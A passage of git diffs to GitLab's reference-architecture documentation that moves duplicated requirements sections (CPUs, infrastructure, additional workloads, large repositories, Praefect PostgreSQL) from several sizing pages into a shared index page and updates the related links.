significantly large repositories or if any [additional workloads](index.md#additional-workloads),
such as [server hooks](../server_hooks.md), have been added.
NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
Due to Gitaly having notable input and output requirements, we strongly
recommend that all Gitaly nodes use solid-state drives (SSDs). These SSDs
@@ -2346,7 +2289,9 @@ services where applicable):
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:

View File

@@ -67,47 +67,7 @@ The diagram above shows that while GitLab can be installed on a single server, i
## Requirements
Before starting, you should take note of the following requirements / guidance for this reference architecture.
### Supported CPUs
This reference architecture was built and tested on Google Cloud Platform (GCP) using the
[Intel Xeon E5 v3 (Haswell)](https://cloud.google.com/compute/docs/cpu-platforms)
CPU platform as a baseline ([Sysbench benchmark](https://gitlab.com/gitlab-org/quality/performance/-/wikis/Reference-Architectures/GCP-CPU-Benchmarks)).
Newer, similarly sized CPUs are supported and may have improved performance as a result. For Omnibus environments, ARM-based equivalents are also supported.
NOTE:
Any "burstable" instance types are not recommended due to inconsistent performance.
### Supported infrastructure
As general guidance, GitLab should run on most infrastructure, such as reputable Cloud Providers (AWS, GCP) and their services,
or self-managed solutions (ESXi), that meet both the specs detailed above and any requirements in this section.
However, this does not constitute a guarantee for every potential permutation.
See [Recommended cloud providers and services](index.md#recommended-cloud-providers-and-services) for more information.
### Additional workloads
The Reference Architectures have been [designed and tested](index.md#validation-and-test-results) for standard GitLab setups with
good headroom in mind to cover most scenarios. However, if any additional workloads are being added to the nodes,
such as security software, you may still need to adjust the specs accordingly to compensate.
This also applies to some GitLab features where it's possible to run custom scripts, for example [server hooks](../server_hooks.md).
As a general rule, it's recommended to have robust monitoring in place to measure the impact of
any additional workloads and to inform any changes that need to be made.
### Swap
In addition to the stated configurations, we recommend having at least 2 GB of
swap on your server, even if you currently have enough available memory. Having
swap helps to reduce the chance of errors occurring if your available memory
changes. We also recommend configuring the kernel's swappiness setting to a
lower value (such as `10`) to make the most of your memory, while still having
the swap available when needed. View the
[Memory requirements](../../install/requirements.md#memory) for details.
Before starting, see the [requirements](index.md#requirements) for reference architectures.
## Setup instructions

View File

@@ -50,7 +50,9 @@ full list of reference architectures, see
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:
@@ -144,66 +146,7 @@ monitor .[#7FFFD4,norank]u--> elb
## Requirements
Before starting, you should take note of the following requirements / guidance for this reference architecture.
### Supported CPUs
This reference architecture was built and tested on Google Cloud Platform (GCP) using the
[Intel Xeon E5 v3 (Haswell)](https://cloud.google.com/compute/docs/cpu-platforms)
CPU platform as a baseline ([Sysbench benchmark](https://gitlab.com/gitlab-org/quality/performance/-/wikis/Reference-Architectures/GCP-CPU-Benchmarks)).
Newer, similarly sized CPUs are supported and may have improved performance as a result. For Omnibus environments, ARM-based equivalents are also supported.
NOTE:
Any "burstable" instance types are not recommended due to inconsistent performance.
### Supported infrastructure
As general guidance, GitLab should run on most infrastructure, such as reputable Cloud Providers (AWS, GCP, Azure) and their services,
or self-managed solutions (ESXi), that meet both the specs detailed above and any requirements in this section.
However, this does not constitute a guarantee for every potential permutation.
See [Recommended cloud providers and services](index.md#recommended-cloud-providers-and-services) for more information.
### Additional workloads
The Reference Architectures have been [designed and tested](index.md#validation-and-test-results) for standard GitLab setups with
good headroom in mind to cover most scenarios. However, if any additional workloads are being added to the nodes,
such as security software, you may still need to adjust the specs accordingly to compensate.
This also applies to some GitLab features where it's possible to run custom scripts, for example [server hooks](../server_hooks.md).
As a general rule, it's recommended to have robust monitoring in place to measure the impact of
any additional workloads and to inform any changes that need to be made.
### Large repositories
The Reference Architectures were tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos (several gigabytes or more) can **significantly** impact the performance
of Git, and in turn the environment itself, if best practices aren't being followed, such as not storing
binary or blob files in LFS. Repositories are at the core of any environment, and the consequences can be wide-ranging
when they are not optimized. Some examples of this impact include [Git packing operations](https://git-scm.com/book/en/v2/Git-Internals-Packfiles)
taking longer and consuming high CPU and memory resources, or Git checkouts taking longer, which affects both users and
CI pipelines alike.
As such, large repositories come with a notable cost and typically require more resources to handle,
significantly so in some cases. It's therefore **strongly** recommended to review large repositories
to ensure they maintain good health and reduce their size wherever possible.
NOTE:
If best practices aren't followed and large repositories are present in the environment,
increased Gitaly specs may be required to ensure stable performance.
Refer to the [Managing large repositories documentation](../../user/project/repository/managing_large_repositories.md)
for more information and guidance.
### Praefect PostgreSQL
It's worth noting that at this time [Praefect requires its own database server](../gitaly/praefect.md#postgresql) and
that to achieve full High Availability a third-party PostgreSQL database solution will be required.
We hope to offer built-in solutions for these restrictions in the future, but in the meantime a non-HA PostgreSQL server
can be set up via Omnibus GitLab, which the above specs reflect. Refer to the following issues for more information: [`omnibus-gitlab#5919`](https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/5919) and [`gitaly#3398`](https://gitlab.com/gitlab-org/gitaly/-/issues/3398).
Before starting, see the [requirements](index.md#requirements) for reference architectures.
## Setup components
@@ -1243,7 +1186,7 @@ NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
The recommended cluster setup includes the following components:
@@ -1551,14 +1494,14 @@ requirements that are dependent on data and load.
NOTE:
Increased specs for Gitaly nodes may be required in some circumstances such as
significantly large repositories or if any [additional workloads](#additional-workloads),
significantly large repositories or if any [additional workloads](index.md#additional-workloads),
such as [server hooks](../server_hooks.md), have been added.
NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
Due to Gitaly having notable input and output requirements, we strongly
recommend that all Gitaly nodes use solid-state drives (SSDs). These SSDs
@@ -2365,7 +2308,9 @@ services where applicable):
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:

View File

@@ -42,7 +42,9 @@ For a full list of reference architectures, see
3. Can be optionally run on reputable third-party load balancing services (LB PaaS). See [Recommended cloud providers and services](index.md#recommended-cloud-providers-and-services) for more information.
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
5. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:
@@ -80,59 +82,7 @@ monitor .[#7FFFD4,norank]u--> elb
## Requirements
Before starting, you should take note of the following requirements / guidance for this reference architecture.
### Supported CPUs
This reference architecture was built and tested on Google Cloud Platform (GCP) using the
[Intel Xeon E5 v3 (Haswell)](https://cloud.google.com/compute/docs/cpu-platforms)
CPU platform as a baseline ([Sysbench benchmark](https://gitlab.com/gitlab-org/quality/performance/-/wikis/Reference-Architectures/GCP-CPU-Benchmarks)).
Newer, similarly sized CPUs are supported and may have improved performance as a result. For Omnibus environments, ARM-based equivalents are also supported.
NOTE:
Any "burstable" instance types are not recommended due to inconsistent performance.
### Supported infrastructure
As general guidance, GitLab should run on most infrastructure, such as reputable Cloud Providers (AWS, GCP) and their services,
or self-managed solutions (ESXi), that meet both the specs detailed above and any requirements in this section.
However, this does not constitute a guarantee for every potential permutation.
See [Recommended cloud providers and services](index.md#recommended-cloud-providers-and-services) for more information.
### Additional workloads
The Reference Architectures have been [designed and tested](index.md#validation-and-test-results) for standard GitLab setups with
good headroom in mind to cover most scenarios. However, if any additional workloads are being added to the nodes,
such as security software, you may still need to adjust the specs accordingly to compensate.
This also applies to some GitLab features where it's possible to run custom scripts, for example [server hooks](../server_hooks.md).
As a general rule, it's recommended to have robust monitoring in place to measure the impact of
any additional workloads and to inform any changes that need to be made.
### Large repositories
The Reference Architectures were tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos (several gigabytes or more) can **significantly** impact the performance
of Git, and in turn the environment itself, if best practices aren't being followed, such as not storing
binary or blob files in LFS. Repositories are at the core of any environment, and the consequences can be wide-ranging
when they are not optimized. Some examples of this impact include [Git packing operations](https://git-scm.com/book/en/v2/Git-Internals-Packfiles)
taking longer and consuming high CPU and memory resources, or Git checkouts taking longer, which affects both users and
CI pipelines alike.
As such, large repositories come with a notable cost and typically require more resources to handle,
significantly so in some cases. It's therefore **strongly** recommended to review large repositories
to ensure they maintain good health and reduce their size wherever possible.
NOTE:
If best practices aren't followed and large repositories are present in the environment,
increased Gitaly specs may be required to ensure stable performance.
Refer to the [Managing large repositories documentation](../../user/project/repository/managing_large_repositories.md)
for more information and guidance.
Before starting, see the [requirements](index.md#requirements) for reference architectures.
## Setup components
@@ -460,14 +410,14 @@ specifically the number of projects and those projects' sizes.
NOTE:
Increased specs for Gitaly nodes may be required in some circumstances such as
significantly large repositories or if any [additional workloads](#additional-workloads),
significantly large repositories or if any [additional workloads](index.md#additional-workloads),
such as [server hooks](../server_hooks.md), have been added.
NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
Due to Gitaly having notable input and output requirements, we strongly
recommend that all Gitaly nodes use solid-state drives (SSDs). These SSDs

View File

@@ -59,7 +59,9 @@ For a full list of reference architectures, see
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:
@@ -150,66 +152,7 @@ monitor .[#7FFFD4,norank]u--> elb
## Requirements
Before starting, you should take note of the following requirements / guidance for this reference architecture.
### Supported CPUs
This reference architecture was built and tested on Google Cloud Platform (GCP) using the
[Intel Xeon E5 v3 (Haswell)](https://cloud.google.com/compute/docs/cpu-platforms)
CPU platform as a baseline ([Sysbench benchmark](https://gitlab.com/gitlab-org/quality/performance/-/wikis/Reference-Architectures/GCP-CPU-Benchmarks)).
Newer, similarly sized CPUs are supported and may have improved performance as a result. For Omnibus environments, ARM-based equivalents are also supported.
NOTE:
Any "burstable" instance types are not recommended due to inconsistent performance.
### Supported infrastructure
As general guidance, GitLab should run on most infrastructure, such as reputable Cloud Providers (AWS, GCP) and their services,
or self-managed solutions (ESXi), that meet both the specs detailed above and any requirements in this section.
However, this does not constitute a guarantee for every potential permutation.
See [Recommended cloud providers and services](index.md#recommended-cloud-providers-and-services) for more information.
### Additional workloads
The Reference Architectures have been [designed and tested](index.md#validation-and-test-results) for standard GitLab setups with
good headroom in mind to cover most scenarios. However, if any additional workloads are being added to the nodes,
such as security software, you may still need to adjust the specs accordingly to compensate.
This also applies to some GitLab features where it's possible to run custom scripts, for example [server hooks](../server_hooks.md).
As a general rule, it's recommended to have robust monitoring in place to measure the impact of
any additional workloads and to inform any changes that need to be made.
### Large repositories
The Reference Architectures were tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos (several gigabytes or more) can **significantly** impact the performance
of Git, and in turn the environment itself, if best practices aren't being followed, such as not storing
binary or blob files in LFS. Repositories are at the core of any environment, and the consequences can be wide-ranging
when they are not optimized. Some examples of this impact include [Git packing operations](https://git-scm.com/book/en/v2/Git-Internals-Packfiles)
taking longer and consuming high CPU and memory resources, or Git checkouts taking longer, which affects both users and
CI pipelines alike.
As such, large repositories come with a notable cost and typically require more resources to handle,
significantly so in some cases. It's therefore **strongly** recommended to review large repositories
to ensure they maintain good health and reduce their size wherever possible.
NOTE:
If best practices aren't followed and large repositories are present in the environment,
increased Gitaly specs may be required to ensure stable performance.
Refer to the [Managing large repositories documentation](../../user/project/repository/managing_large_repositories.md)
for more information and guidance.
### Praefect PostgreSQL
It's worth noting that at this time [Praefect requires its own database server](../gitaly/praefect.md#postgresql) and
that to achieve full High Availability a third-party PostgreSQL database solution will be required.
We hope to offer built-in solutions for these restrictions in the future, but in the meantime a non-HA PostgreSQL server
can be set up via Omnibus GitLab, which the above specs reflect. Refer to the following issues for more information: [`omnibus-gitlab#5919`](https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/5919) and [`gitaly#3398`](https://gitlab.com/gitlab-org/gitaly/-/issues/3398).
Before starting, see the [requirements](index.md#requirements) for reference architectures.
## Setup components
@@ -1178,7 +1121,7 @@ NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
The recommended cluster setup includes the following components:
@@ -1485,14 +1428,14 @@ requirements that are dependent on data and load.
NOTE:
Increased specs for Gitaly nodes may be required in some circumstances such as
significantly large repositories or if any [additional workloads](#additional-workloads),
significantly large repositories or if any [additional workloads](index.md#additional-workloads),
such as [server hooks](../server_hooks.md), have been added.
NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
Due to Gitaly having notable input and output requirements, we strongly
recommend that all Gitaly nodes use solid-state drives (SSDs). These SSDs
@@ -2334,7 +2277,9 @@ services where applicable):
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:

View File

@ -50,7 +50,9 @@ full list of reference architectures, see
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:
@ -144,66 +146,7 @@ monitor .[#7FFFD4,norank]u--> elb
## Requirements
Before starting, you should take note of the following requirements and guidance for this reference architecture.
### Supported CPUs
This reference architecture was built and tested on Google Cloud Platform (GCP) using the
[Intel Xeon E5 v3 (Haswell)](https://cloud.google.com/compute/docs/cpu-platforms)
CPU platform as a baseline ([Sysbench benchmark](https://gitlab.com/gitlab-org/quality/performance/-/wikis/Reference-Architectures/GCP-CPU-Benchmarks)).
Newer, similarly sized CPUs are supported and may have improved performance as a result. For Omnibus environments, ARM-based equivalents are also supported.
NOTE:
Any "burstable" instance types are not recommended due to inconsistent performance.
### Supported infrastructure
As general guidance, GitLab should run on most infrastructure such as reputable Cloud Providers (AWS, GCP, Azure) and their services,
or self-managed solutions (ESXi) that meet both the specs detailed above and any requirements in this section.
However, this does not constitute a guarantee for every potential permutation.
See [Recommended cloud providers and services](index.md#recommended-cloud-providers-and-services) for more information.
### Additional workloads
The Reference Architectures have been [designed and tested](index.md#validation-and-test-results) for standard GitLab setups with
good headroom in mind to cover most scenarios. However, if any additional workloads are being added on the nodes,
such as security software, you may still need to adjust the specs accordingly to compensate.
This also applies for some GitLab features where it's possible to run custom scripts, for example [server hooks](../server_hooks.md).
As a general rule, it's recommended to have robust monitoring in place to measure the impact of
any additional workloads and to inform any changes that need to be made.
### Large repositories
The Reference Architectures were tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos (several gigabytes or more) can **significantly** impact the performance
of Git, and in turn the environment itself, if best practices aren't being followed, such as not storing
binary or blob files in LFS. Repositories are at the core of any environment and the consequences can be wide-ranging
when they are not optimized. Some examples of this impact include [Git packing operations](https://git-scm.com/book/en/v2/Git-Internals-Packfiles)
taking longer and consuming high CPU and memory resources, or Git checkouts taking longer, which affects both users and
CI pipelines alike.
As such, large repositories come with notable cost and typically require more resources to handle,
significantly so in some cases. It's therefore **strongly** recommended to review large repositories
to ensure they maintain good health and to reduce their size wherever possible.
NOTE:
If best practices aren't followed and large repositories are present on the environment,
increased Gitaly specs may be required to ensure stable performance.
Refer to the [Managing large repositories documentation](../../user/project/repository/managing_large_repositories.md)
for more information and guidance.
### Praefect PostgreSQL
It's worth noting that at this time [Praefect requires its own database server](../gitaly/praefect.md#postgresql) and
that to achieve full High Availability a third-party PostgreSQL database solution will be required.
We hope to offer a built-in solution for these restrictions in the future, but in the meantime a non-HA PostgreSQL server
can be set up via Omnibus GitLab, which the above specs reflect. Refer to the following issues for more information: [`omnibus-gitlab#5919`](https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/5919) & [`gitaly#3398`](https://gitlab.com/gitlab-org/gitaly/-/issues/3398).
Before starting, see the [requirements](index.md#requirements) for reference architectures.
## Setup components
@ -1236,7 +1179,7 @@ NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
The recommended cluster setup includes the following components:
@ -1546,14 +1489,14 @@ requirements that are dependent on data and load.
NOTE:
Increased specs for Gitaly nodes may be required in some circumstances such as
significantly large repositories or if any [additional workloads](#additional-workloads),
significantly large repositories or if any [additional workloads](index.md#additional-workloads),
such as [server hooks](../server_hooks.md), have been added.
NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
Due to Gitaly having notable input and output requirements, we strongly
recommend that all Gitaly nodes use solid-state drives (SSDs). These SSDs
@ -2363,7 +2306,9 @@ services where applicable):
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:

View File

@ -56,7 +56,9 @@ costly-to-operate environment by using the
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:
@ -147,66 +149,7 @@ monitor .[#7FFFD4,norank]u--> elb
## Requirements
Before starting, you should take note of the following requirements and guidance for this reference architecture.
### Supported CPUs
This reference architecture was built and tested on Google Cloud Platform (GCP) using the
[Intel Xeon E5 v3 (Haswell)](https://cloud.google.com/compute/docs/cpu-platforms)
CPU platform as a baseline ([Sysbench benchmark](https://gitlab.com/gitlab-org/quality/performance/-/wikis/Reference-Architectures/GCP-CPU-Benchmarks)).
Newer, similarly sized CPUs are supported and may have improved performance as a result. For Omnibus environments, ARM-based equivalents are also supported.
NOTE:
Any "burstable" instance types are not recommended due to inconsistent performance.
### Supported infrastructure
As general guidance, GitLab should run on most infrastructure such as reputable Cloud Providers (AWS, GCP) and their services,
or self-managed solutions (ESXi) that meet both the specs detailed above and any requirements in this section.
However, this does not constitute a guarantee for every potential permutation.
See [Recommended cloud providers and services](index.md#recommended-cloud-providers-and-services) for more information.
### Additional workloads
The Reference Architectures have been [designed and tested](index.md#validation-and-test-results) for standard GitLab setups with
good headroom in mind to cover most scenarios. However, if any additional workloads are being added on the nodes,
such as security software, you may still need to adjust the specs accordingly to compensate.
This also applies for some GitLab features where it's possible to run custom scripts, for example [server hooks](../server_hooks.md).
As a general rule, it's recommended to have robust monitoring in place to measure the impact of
any additional workloads and to inform any changes that need to be made.
### Large repositories
The Reference Architectures were tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos (several gigabytes or more) can **significantly** impact the performance
of Git, and in turn the environment itself, if best practices aren't being followed, such as not storing
binary or blob files in LFS. Repositories are at the core of any environment and the consequences can be wide-ranging
when they are not optimized. Some examples of this impact include [Git packing operations](https://git-scm.com/book/en/v2/Git-Internals-Packfiles)
taking longer and consuming high CPU and memory resources, or Git checkouts taking longer, which affects both users and
CI pipelines alike.
As such, large repositories come with notable cost and typically require more resources to handle,
significantly so in some cases. It's therefore **strongly** recommended to review large repositories
to ensure they maintain good health and to reduce their size wherever possible.
NOTE:
If best practices aren't followed and large repositories are present on the environment,
increased Gitaly specs may be required to ensure stable performance.
Refer to the [Managing large repositories documentation](../../user/project/repository/managing_large_repositories.md)
for more information and guidance.
### Praefect PostgreSQL
It's worth noting that at this time [Praefect requires its own database server](../gitaly/praefect.md#postgresql) and
that to achieve full High Availability a third-party PostgreSQL database solution is required.
We hope to offer a built-in solution for these restrictions in the future, but in the meantime a non-HA PostgreSQL server
can be set up via Omnibus GitLab, which the above specs reflect. Refer to the following issues for more information: [`omnibus-gitlab#5919`](https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/5919) & [`gitaly#3398`](https://gitlab.com/gitlab-org/gitaly/-/issues/3398).
Before starting, see the [requirements](index.md#requirements) for reference architectures.
## Setup components
@ -1174,7 +1117,7 @@ NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
The recommended cluster setup includes the following components:
@ -1482,14 +1425,14 @@ requirements that are dependent on data and load.
NOTE:
Increased specs for Gitaly nodes may be required in some circumstances such as
significantly large repositories or if any [additional workloads](#additional-workloads),
significantly large repositories or if any [additional workloads](index.md#additional-workloads),
such as [server hooks](../server_hooks.md), have been added.
NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
Due to Gitaly having notable input and output requirements, we strongly
recommend that all Gitaly nodes use solid-state drives (SSDs). These SSDs
@ -2309,7 +2252,9 @@ services where applicable):
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:

View File

@ -122,6 +122,88 @@ classDef default fill:#FCA326
linkStyle default fill:none,stroke:#7759C2
```
## Requirements
Before implementing a reference architecture, refer to the following requirements and guidance.
### Supported CPUs
These reference architectures were built and tested on Google Cloud Platform (GCP) using the
[Intel Xeon E5 v3 (Haswell)](https://cloud.google.com/compute/docs/cpu-platforms)
